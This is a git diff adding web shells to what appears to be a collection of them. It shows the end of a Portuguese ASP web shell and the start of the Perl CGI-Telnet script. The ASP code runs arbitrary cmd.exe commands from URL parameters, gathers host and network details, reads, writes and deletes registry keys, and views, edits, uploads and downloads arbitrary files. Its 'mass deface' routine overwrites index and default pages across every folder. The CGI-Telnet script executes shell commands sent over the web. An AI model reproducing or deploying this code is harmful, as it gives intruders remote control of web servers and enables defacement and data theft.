+						       "<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("path")) & """>" & _
+						       "Digite o novo nome: <input type=""text"" name=""newname"">" & _
+						       "&nbsp;&nbsp;<input type=""submit"" value=""alterar"">" & _
+						       "</form>"
+		Else
+			caminho = Replace(Trim(Request.QueryString("path")),"|","\")
+			Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+			Set MyFile = ObjFSO.GetFile(caminho)
+			destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.QueryString("newname"))
+			MyFile.Move (destino)
+			If Err.Number = 0 Then
+				Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & caminho & "</b><br>renomeado para<b>: " & destino
+				Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
+			End If	
+		End If
+	Case "error"
+		Response.Write "<center><font face='arial' size='2' color='red'> <b>CÓDIGO CORROMPIDO<BR>CORRUPT CODE</font></center>"
+	Case "cmd"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		Set oScript = Server.CreateObject("WSCRIPT.SHELL") 
+		Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") 
+		Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 
+		szCMD = Request.QueryString(".CMD") 
+		If (szCMD <> "") Then 
+			szTempFile = "c:\" & oFileSys.GetTempName( ) 
+			Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 
+			Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) 
+		End If 
+		Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET""><input type=""hidden"" name=""action"" value=""cmd""><input type=text name="".CMD"" size=45 value=""" & szCMD & """><input type=submit value=""Run""></FORM><br><br> "
+		If (IsObject(oFile)) Then 
+			On Error Resume Next 
+			Response.Write "<font face=""arial"">"
+			Response.Write Replace(Replace(Server.HTMLEncode(oFile.ReadAll),VbCrLf,"<br>")," ","&nbsp;")
+			oFile.Close 
+			Call oFileSys.DeleteFile(szTempFile, True) 
+		End If 
+	Case "info"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		Set WshNetwork = Server.CreateObject("WScript.Network")
+		Set WshShell = Server.CreateObject("WScript.Shell")
+		Set WshEnv = WshShell.Environment("SYSTEM")
+		Response.Write "<br><font face=arial size=2>"
+		Response.Write "<b>IDENTIFICAÇÃO DE REDE:</b><br>"
+		Response.Write "<b>Usuário: </b>" & WshNetwork.UserName & "<br>"
+		Response.Write "<b>Nome do Computador: </b>" & WshNetwork.ComputerName & "<br>"
+		Response.Write "<b>Usuário do Domínio: </b>" & WshNetwork.UserDomain & "<br>"
+		Set Drives = WshNetwork.EnumNetworkDrives
+		For i = 0 to Drives.Count - 1
+			Response.Write "<b>Drive de Rede (Mapeado): </b>" & Drives.Item(i) & "<br>"
+		Next
+		Response.Write "<br><b>FÍSICO:</b><br>"
+		Response.Write "<b>Arquitetura do Processador: </b>" & WshEnv("PROCESSOR_ARCHITECTURE") & "<br>"
+		Response.Write "<b>Número de Processadores: </b>" & WshEnv("NUMBER_OF_PROCESSORS") & "<br>"
+		Response.Write "<b>Identificador do Processador: </b>" & WshEnv("PROCESSOR_IDENTIFIER") & "<br>"
+		Response.Write "<b>Nível do Processador: </b>" & WshEnv("PROCESSOR_LEVEL") & "<br>"
+		Response.Write "<b>Revisão do Processador: </b>" & WshEnv("PROCESSOR_REVISION") & "<br>"
+		Response.Write "<br><b>LÓGICO:</b><br>"
+		Response.Write "<b>IP: </b>" & request.servervariables("LOCAL_ADDR") & "<br>"
+		Response.Write "<b>Sistema Operacional: </b>" & WshEnv("OS") & "<br>"
+		Response.Write "<b>Servidor Web: </b>" & request.servervariables("SERVER_SOFTWARE") & "<br>"
+		Response.Write "<b>Especificação do Command: </b>" & WshShell.ExpandEnvironmentStrings("%ComSpec%") & "<br>"
+		Response.Write "<b>Caminhos no Path: </b>" & WshEnv("PATH") & "<br>"
+		Response.Write "<b>Executáveis: </b>" & WshEnv("PATHEXT") & "<br>"
+		Response.Write "<b>Prompt: </b> " & WshEnv("PROMPT") & "<br>"
+		Response.Write "<b>System Drive: </b>" & WshShell.ExpandEnvironmentStrings("%SYSTEMDRIVE%") & "<br>"
+		Response.Write "<b>System Root: </b>" & WshShell.ExpandEnvironmentStrings("%SYSTEMROOT%") & "<br>"
+		Response.Write "<b>Caminho do System32: </b>" & WshShell.CurrentDirectory & "<br>"
+		Set Drives = Nothing
+		Set WshNetwork = Nothing
+		Set WshShell = Nothing
+		Set WshEnv = Nothing
+	Case "reg"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		Set WshShell = Server.CreateObject("WScript.Shell")
+		Response.Write "<font face=""arial"" size=""2""><b>Editor de Registro:</b><br><br>"
+		Select Case Trim(Request.QueryString("regaction"))
+			Case "w"
+				If Trim(Request.QueryString("process")) = "yes" Then
+					Select Case Trim(Request.QueryString("type"))
+						Case "1"
+							teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_SZ")
+						Case "2"
+							teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_DWORD")
+						Case "3"
+							teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_BINARY")
+						Case "4"
+							teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_EXPAND_SZ")
+						Case "5"
+							teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_MULTI_SZ")
+					End Select
+					Response.Write "<center><br><font face=""arial"" size=""2"">Registro <b>"
+					Response.Write Trim(Request.QueryString("key")) & "</b> Escrito</center>"
+					Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
+				Else
+					Response.Write "<table><tr><td><font face=""arial"" size=""2"">ROOT KEY NAME</td><td><font face=""arial"" size=""2"">ABREVIAÇÃO</td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CURRENT_USER </td><td><font face=""arial"" size=""1""> HKCU </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_LOCAL_MACHINE </td><td><font face=""arial"" size=""1""> HKLM </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CLASSES_ROOT </td><td><font face=""arial"" size=""1""> HKCR </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_USERS </td><td><font face=""arial"" size=""1""> HKEY_USERS </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CURRENT_CONFIG </td><td><font face=""arial"" size=""1""> HKEY_CURRENT_CONFIG </td></tr></table><br>"
+					Response.Write "<table><tr><td><font face=""arial"" size=""2"">Tipo </td><td><font face=""arial"" size=""2""> Descrição </td><td><font face=""arial"" size=""2""> Na forma de </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">REG_SZ </td><td><font face=""arial"" size=""1""> string </td><td><font face=""arial"" size=""1""> string </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">REG_DWORD </td><td><font face=""arial"" size=""1""> número </td><td><font face=""arial"" size=""1""> inteiro </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">REG_BINARY </td><td><font face=""arial"" size=""1""> valor binário </td><td><font face=""arial"" size=""1""> VBArray de inteiros </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">REG_EXPAND_SZ </td><td><font face=""arial"" size=""1""> string expandível (ex. ""%windir%\\calc.exe"") </td><td><font face=""arial"" size=""1""> string </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">REG_MULTI_SZ </td><td><font face=""arial"" size=""1""> array de strings </td><td><font face=""arial"" size=""1""> VBArray de strings </td></tr></table>"
+					Response.Write "<br><br><FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
+					Response.Write "<table><tr><td><font face=""arial"" size=""1"">KEY: </td><td><input type=""text"" name=""key""> <font face=""arial"" size=""1""><br>( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )</td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">VALUE:</td><td><input type=""text"" name=""value""></td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">TYPE:</td><td><SELECT NAME=""type"">"
+					Response.Write "<OPTION VALUE=""1"">REG_SZ </option>"
+					Response.Write "<OPTION VALUE=""2"">REG_DWORD </option>"
+					Response.Write "<OPTION VALUE=""3"">REG_BINARY </option>"
+					Response.Write "<OPTION VALUE=""4"">REG_EXPAND_SZ </option>"
+					Response.Write "<OPTION VALUE=""5"">REG_MULTI_SZ </option></select><br>"
+					Response.Write "<input type=""hidden"" name=""regaction"" value=""w"">"
+					Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
+					Response.Write "<input type=""hidden"" name=""process"" value=""yes""></td></tr>"
+					Response.Write "<tr><td></td><td><input type=""submit"" value=""OK""></form></td></tr></table>"
+					Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
+				End If
+			Case "r"
+				If Trim(Request.QueryString("process")) = "yes" Then
+					Response.Write "<font face=""arial"" size=""2"">" & Trim(Request.QueryString("key")) & "<br>"
+					Response.Write "Valor: <b>" & WshShell.RegRead (Trim(Request.QueryString("key")))
+				Else
+					Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
+					Response.Write "<font face=""arial"" size=""1"">KEY: <input type=""text"" name=""key""> <br>( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )<br>"
+					Response.Write "<input type=""hidden"" name=""regaction"" value=""r"">"
+					Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
+					Response.Write "<input type=""hidden"" name=""process"" value=""yes"">"
+					Response.Write "<input type=""submit"" value=""OK""></form>"
+				End If
+				Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
+			Case "d"
+				If Trim(Request.QueryString("process")) = "yes" Then
+					teste = WshShell.RegDelete (Trim(Request.QueryString("key")))
+					Response.Write "Chave <b>" & Trim(Request.QueryString("key")) & " </b>deletada"
+				Else
+					Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
+					Response.Write "<font face=""arial"" size=""1"">KEY: <input type=""text"" name=""key""> ( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )<br>"
+					Response.Write "<input type=""hidden"" name=""regaction"" value=""d"">"
+					Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
+					Response.Write "<input type=""hidden"" name=""process"" value=""yes"">"
+					Response.Write "<input type=""submit"" value=""OK""></form>"
+				End If
+				Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
+			Case Else
+				Response.Write "<font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=w"">ESCREVER CHAVE</a><br><br>"
+				Response.Write "<a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=r"">LER CHAVE</a><br><br>"
+				Response.Write "<a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=d"">DELETAR CHAVE</a><br>"
+		End Select
+		Set WshShell = Nothing
+	Case "txtview"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp & "<font face=""arial"" size=""2"">"
+		file = Replace(Trim(Request.QueryString("file")),"|","\")
+		Set fso = CreateObject("Scripting.FileSystemObject")  
+		Set a = fso.OpenTextFile(file)
+		Response.Write Replace(Replace(Server.HTMLEncode(a.ReadAll),VbCrLf,"<br>")," ","&nbsp;")
+		Set a = Nothing
+		Set fso = Nothing
+	Case "txtedit"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		If Request.Form.Count = 0 Then
+			file = Replace(Trim(Request.QueryString("file")),"|","\")
+			Set fso = CreateObject("Scripting.FileSystemObject")
+			Set a = fso.OpenTextFile(file)
+			Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit"">"
+			Response.Write "<textarea cols='85' rows='25' name=""content"" wrap=""physical"" >" & Server.HTMLEncode(a.ReadAll) & "</textarea><br>"
+			Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("file")) & """>"
+			Response.Write "<input type=""submit"" name=""savemethod"" value=""Save"">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=""submit"" name=""savemethod"" value=""Save as""></form>"
+			Set a = Nothing
+			Set fso = Nothing
+		Else
+			Select Case Trim(Request.Form("savemethod"))
+				Case "Save"
+					Set fso = CreateObject("Scripting.FileSystemObject")
+					novotexto = Trim(Request.Form("content"))
+					novotexto = Split(novotexto,vbCrLf)
+					Set objstream = fso.OpenTextFile(Replace(Trim(Request.Form("path")),"|","\"),2)
+					For i = 0 To UBound(novotexto)
+						objstream.WriteLine(novotexto(i))
+					Next
+					objstream.Close
+					Set objstream = Nothing
+					Response.Write "Texto salvo: <b>" & Replace(Trim(Request.Form("path")),"|","\") & "</b>"
+				Case "Save as"
+					Set fso = CreateObject("Scripting.FileSystemObject")
+					novotexto = Trim(Request.Form("content"))
+					novotexto = Split(novotexto,vbCrLf)
+					caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt"
+					Set objstream = fso.CreateTextFile(caminho,true,false)
+					For i = 0 To UBound(novotexto)
+						objstream.WriteLine(novotexto(i))
+					Next
+					objstream.Close
+					Set objstream = Nothing
+					Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit"">"
+					Response.Write "<input type=""text"" name=""filename"" value=""" & showobj(Replace(Trim(Request.Form("path")),"|","\")) & """><br>"
+					Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.Form("path")) & """>"
+					Response.Write "<input type=""submit"" name=""savemethod2"" value=""Save""></form>"
+				Case Else
+					caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt"
+					Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+					Set MyFile = ObjFSO.GetFile(caminho)
+					destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.Form("filename"))
+					MyFile.Move (destino)
+					If Err.Number = 0 Then
+						Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & destino & "</b> salvo!"
+						Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
+					End If	
+			End Select
+		End If
+	Case "download"
+		Response.Buffer = True
+		Response.Clear
+		strFileName = Replace(Trim(Request.QueryString("file")),"|","\")
+		strFile = Right(strFileName, Len(strFileName) - InStrRev(strFileName,"\"))
+		strFileType = Request.QueryString("type")
+		if strFileType = "" then strFileType = "application/download"
+		Set fso = Server.CreateObject("Scripting.FileSystemObject")
+		Set f = fso.GetFile(strFilename)
+		intFilelength = f.size
+		Set f = Nothing
+		Set fso = Nothing
+		Response.AddHeader "Content-Disposition", "attachment; filename=" & strFile
+		Response.AddHeader "Content-Length", intFilelength
+		Response.Charset = "UTF-8"
+		Response.ContentType = strFileType
+		Set Stream = Server.CreateObject("ADODB.Stream")
+		Stream.Open
+		Stream.type = 1
+		Stream.LoadFromFile strFileName
+		Response.BinaryWrite Stream.Read
+		Response.Flush
+		Stream.Close
+		Set Stream = Nothing
+	Case "upload"
+		If Request.QueryString("processupload") <> "yes" Then
+			Response.Write "<FORM METHOD=""POST"" ENCTYPE=""multipart/form-data"" ACTION=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=upload&processupload=yes&path=" & Request.QueryString("path") & """>"
+			Response.Write "<TABLE BORDER=0>"
+			Response.Write "<tr><td><font face=""arial"" size=""2""><b>Select a file to upload:</b><br><INPUT TYPE=FILE SIZE=50 NAME=""FILE1""></td></tr>"
+			Response.Write "<tr><td align=""center""><font face=""arial"" size=""2""><INPUT TYPE=SUBMIT VALUE=""Upload!""></td></tr>"
+			Response.Write "</TABLE>"
+		Else
+			Set Uploader = New FileUploader
+			Uploader.Upload()
+			If Uploader.Files.Count = 0 Then
+				Response.Write "File(s) not uploaded."
+			Else
+				For Each File In Uploader.Files.Items
+					File.SaveToDisk Replace(Trim(Request.QueryString("path")),"|","\")
+					Response.Write "File Uploaded: " & File.FileName & "<br>"
+					Response.Write "Size: " & File.FileSize & " bytes<br>"
+					Response.Write "Type: " & File.ContentType & "<br><br>"
+					Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
+				Next
+			End If
+		End If
+	Case "mass"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		Sub themassdeface(caminhodomass,metodo,ObjFSO,MeuArquivo)
+			On Error Resume Next
+			Set MonRep = ObjFSO.GetFolder(caminhodomass)
+			Set ColFolders = MonRep.SubFolders
+			for each folderItem in ColFolders
+				destino1 = folderItem.path & "\index.htm"
+				destino2 = folderItem.path & "\index.html"
+				destino3 = folderItem.path & "\index.asp"
+				destino4 = folderItem.path & "\index.cfm"
+				destino5 = folderItem.path & "\index.php"
+				destino6 = folderItem.path & "\default.htm"
+				destino7 = folderItem.path & "\default.html"
+				destino8 = folderItem.path & "\default.asp"
+				destino9 = folderItem.path & "\default.cfm"
+				destino10 = folderItem.path & "\default.php"
+				MeuArquivo.Copy(destino1)
+				MeuArquivo.Copy(destino2)
+				MeuArquivo.Copy(destino3)
+				MeuArquivo.Copy(destino4)
+				MeuArquivo.Copy(destino5)
+				MeuArquivo.Copy(destino6)
+				MeuArquivo.Copy(destino7)
+				MeuArquivo.Copy(destino8)
+				MeuArquivo.Copy(destino9)
+				MeuArquivo.Copy(destino10)
+				Response.Write "<table><tr><td><font face='arial' size='2'>&lt;DIR&gt; " & folderItem.path & "</td>"
+				If Err.Number = 0 Then
+					Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>DONE!</font></td></tr>"
+				Else
+					Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr></table>"
+				End If
+				Err.Number = 0
+				Response.Flush
+				If metodo = "brute" Then
+					Call themassdeface(folderItem.path & "\","brute",ObjFSO,MeuArquivo)
+				End If
+			next
+		End Sub
+		Sub brutemass(caminho,massaction)
+			If massaction = "test" Then
+				On Error Resume Next
+				Set MonRep = ObjFSO.GetFolder(caminho)
+				Set ColFolders = MonRep.SubFolders
+				Set ColFiles0 = MonRep.Files
+				for each folderItem in ColFolders
+					Set TotalFolders = ObjFSO.GetFolder(folderItem.path)
+					Set EachFolder = TotalFolders.SubFolders
+					Response.Write "<table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
+					maindestino = folderItem.path & "\"
+					MeuArquivo.Copy(maindestino)
+					Response.Write "<tr><td><b><font face='arial' size='2'>&lt;DIR&gt; " & maindestino & "</b></td>"
+					If Err.Number = 0 Then
+						Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
+					Else
+						Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
+					End If
+					Err.Number = 0
+					Response.Flush
+					If EachFolder.count > 0 Then
+						masscontador = 0
+						for each subpasta in EachFolder
+							masscontador = masscontador + 1
+							destino = subpasta.path & "\"
+							If masscontador = 1 Then
+								destinofinal = destino
+								pathfinal = subpasta.path
+								Err.Number = 0
+								MeuArquivo.Copy(destinofinal)
+								Response.Write "<tr><td><font face='arial' size='2'>&lt;DIR&gt; " & showobj(pathfinal) & "</td>"
+								If Err.Number = 0 Then
+									Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
+								Else
+									Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
+								End If
+								Err.Number = 0
+								Response.Flush
+							Else
+								MeuArquivo.Copy(destino)
+								Response.Write "<tr><td><font face='arial' size='2'>&lt;DIR&gt; " & showobj(subpasta.path) & "</td>"
+								If Err.Number = 0 Then
+									Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
+								Else
+									Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
+								End If
+								Err.Number = 0
+								Response.Flush
+							End If
+						next
+						masscontador = 0
+					End If
+					Response.Write "</table><br>"
+					Call brutemass(folderItem.path & "\","test")
+				next
+				Set MonRep = Nothing
+				Set ColFolders = Nothing
+				Set ColFiles0 = Nothing
+			Else
+				If Request.Form.Count = 0 Then
+					Response.Write "<font face=""arial"" size=""2""><br><br><b>Brute:</b> copia os arquivos do deface para todas as pastas e subpastas (todos os níveis) do diretório escolhido (mais demorado). O tempo do deface vai variar de acordo com o numero TOTAL de diretórios.<br><br>"
+					Response.Write "<b>Single:</b> copia os arquivos do deface apenas para as pastas (primeiro nível) do diretório escolhido. Não inclui subpastas.<br><br>"
+					Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=dfc"">"
+					Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("path")) & """>"
+					Response.Write "<center><font face=""arial"" size=""2"">Insira o código:<br>"
+					Response.Write "<textarea cols='65' rows='15' name=""content""></textarea><br>"
+					Response.Write "<input type=""radio"" name=""massopt"" value=""brute"" checked>Brute&nbsp;&nbsp;&nbsp;"
+					Response.Write "<input type=""radio"" name=""massopt"" value=""single"">Single<br>"
+					Response.Write "<input type=""submit"" value=""w00t!""></center>"
+					Response.Write "</form>"
+				Else
+					Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+					patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
+					arquivomassdfc = patharquivotxt & "teste.txt"
+					Set Arquivotxt = ObjFso.OpenTextFile(arquivomassdfc, 2, True, False)
+					vetordelinhas = Split(Request.Form("content"),VbCrLf)
+					For i = 0 To UBound(vetordelinhas)
+						Arquivotxt.WriteLine(vetordelinhas(i))
+					Next
+					Set MeuArquivo = ObjFSO.GetFile(arquivomassdfc)
+					
+					If Request.Form("massopt") = "single" Then
+						Call themassdeface(caminho,"single",ObjFSO,MeuArquivo)
+					ElseIf Request.Form("massopt") = "brute" Then
+						Call themassdeface(caminho,"brute",ObjFSO,MeuArquivo)
+					End If
+				End If
+			End If
+		End Sub
+		If Trim(Request.QueryString("massact")) = "test" Then
+			Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+			patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
+			arquivo = patharquivotxt & "_vti_cnf.log"
+			Set Arquivotxt = ObjFSO.CreateTextFile(arquivo,True)
+			Set MeuArquivo = ObjFSO.GetFile(arquivo)
+			Call brutemass(Replace(Trim(Request.QueryString("path")),"|","\"),"test")
+		ElseIf Trim(Request.QueryString("massact")) = "dfc" Then
+			Call brutemass(Replace(Trim(Request.Form("path")),"|","\"),"dfc")
+		End If
+	Case Else
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		Call showcontent()
+End Select
+If Err.Number <> 0 Then
+	Response.Write "<br><font face='arial' size='2'>ERRO: " & Err.Number & "<br><br><b>" & UCase(Err.Description) & "</b><br>Acesse o <b>ONLINE HELP</b> para a explicação do erro"
+End If
+Response.Write endcode
+%>
diff --git a/138shell/T/telnet.cgi.txt b/138shell/T/telnet.cgi.txt
new file mode 100644
index 0000000..15e062c
--- /dev/null
+++ b/138shell/T/telnet.cgi.txt
@@ -0,0 +1,697 @@
+#!/usr/bin/perl
+#------------------------------------------------------------------------------
+# Copyright and Licence
+#------------------------------------------------------------------------------
+# CGI-Telnet Version 1.0 for NT and Unix : Run Commands on your Web Server
+#
+# Copyright (C) 2001 Rohitab Batra
+# Permission is granted to use, distribute and modify this script so long
+# as this copyright notice is left intact. If you make changes to the script
+# please document them and inform me. If you would like any changes to be made
+# in this script, you can e-mail me.
+#
+# Author: Rohitab Batra
+# Author e-mail: rohitab@rohitab.com
+# Author Homepage: http://www.rohitab.com/
+# Script Homepage: http://www.rohitab.com/cgiscripts/cgitelnet.html
+# Product Support: http://www.rohitab.com/support/
+# Discussion Forum: http://www.rohitab.com/discuss/
+# Mailing List: http://www.rohitab.com/mlist/
+#------------------------------------------------------------------------------
+
+#------------------------------------------------------------------------------
+# Installation
+#------------------------------------------------------------------------------
+# To install this script
+#
+# 1. Modify the first line "#!/usr/bin/perl" to point to the correct path on
+#    your server. For most servers, you may not need to modify this.
+# 2. Change the password in the Configuration section below.
+# 3. If you're running the script under Windows NT, set $WinNT = 1 in the
+#    Configuration Section below.
+# 4. Upload the script to a directory on your server which has permissions to
+#    execute CGI scripts. This is usually cgi-bin. Make sure that you upload
+#    the script in ASCII mode.
+# 5. Change the permission (CHMOD) of the script to 755.
+# 6. Open the script in your web browser. If you uploaded the script in
+#    cgi-bin, this should be http://www.yourserver.com/cgi-bin/cgitelnet.pl
+# 7. Login using the password that you specified in Step 2.
+#------------------------------------------------------------------------------
+
+#------------------------------------------------------------------------------
+# Configuration: You need to change only $Password and $WinNT. The other
+# values should work fine for most systems.
+#------------------------------------------------------------------------------
+$Password = "";         # Change this. You will need to enter this
+                                # to login.
+
+$WinNT = 0;                     # You need to change the value of this to 1 if
+                                # you're running this script on a Windows NT
+                                # machine. If you're running it on Unix, you
+                                # can leave the value as it is.
+
+$NTCmdSep = "&";                # This character is used to seperate 2 commands
+                                # in a command line on Windows NT.
+
+$UnixCmdSep = ";";              # This character is used to seperate 2 commands
+                                # in a command line on Unix.
+
+$CommandTimeoutDuration = 100000;   # Time in seconds after commands will be killed
+                                # Don't set this to a very large value. This is
+                                # useful for commands that may hang or that
+                                # take very long to execute, like "find /".
+                                # This is valid only on Unix servers. It is
+                                # ignored on NT Servers.
+
+$ShowDynamicOutput = 1;         # If this is 1, then data is sent to the
+                                # browser as soon as it is output, otherwise
+                                # it is buffered and send when the command
+                                # completes. This is useful for commands like
+                                # ping, so that you can see the output as it
+                                # is being generated.
+
+# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
+
+$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
+$CmdPwd = ($WinNT ? "cd" : "pwd");
+$PathSep = ($WinNT ? "\\" : "/");
+$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
+
+#------------------------------------------------------------------------------
+# Reads the input sent by the browser and parses the input variables. It
+# parses GET, POST and multipart/form-data that is used for uploading files.
+# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
+# Other variables can be accessed using $in{'var'}, where var is the name of
+# the variable. Note: Most of the code in this function is taken from other CGI
+# scripts.
+#------------------------------------------------------------------------------
+sub ReadParse
+{
+        local (*in) = @_ if @_;
+        local ($i, $loc, $key, $val);
+
+        $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
+
+        if($ENV{'REQUEST_METHOD'} eq "GET")
+        {
+                $in = $ENV{'QUERY_STRING'};
+        }
+        elsif($ENV{'REQUEST_METHOD'} eq "POST")
+        {
+                binmode(STDIN) if $MultipartFormData & $WinNT;
+                read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
+        }
+
+        # handle file upload data
+        if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
+        {
+                $Boundary = '--'.$1; # please refer to RFC1867
+                @list = split(/$Boundary/, $in);
+                $HeaderBody = $list[1];
+                $HeaderBody =~ /\r\n\r\n|\n\n/;
+                $Header = $`;
+                $Body = $';
+                $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
+                $in{'filedata'} = $Body;
+                $Header =~ /filename=\"(.+)\"/;
+                $in{'f'} = $1;
+                $in{'f'} =~ s/\"//g;
+                $in{'f'} =~ s/\s//g;
+
+                # parse trailer
+                for($i=2; $list[$i]; $i++)
+                {
+                        $list[$i] =~ s/^.+name=$//;
+                        $list[$i] =~ /\"(\w+)\"/;
+                        $key = $1;
+                        $val = $';
+                        $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
+                        $val =~ s/%(..)/pack("c", hex($1))/ge;
+                        $in{$key} = $val;
+                }
+        }
+        else # standard post data (url encoded, not multipart)
+        {
+                @in = split(/&/, $in);
+                foreach $i (0 .. $#in)
+                {
+                        $in[$i] =~ s/\+/ /g;
+                        ($key, $val) = split(/=/, $in[$i], 2);
+                        $key =~ s/%(..)/pack("c", hex($1))/ge;
+                        $val =~ s/%(..)/pack("c", hex($1))/ge;
+                        $in{$key} .= "\0" if (defined($in{$key}));
+                        $in{$key} .= $val;
+                }
+        }
+}
+
+#------------------------------------------------------------------------------
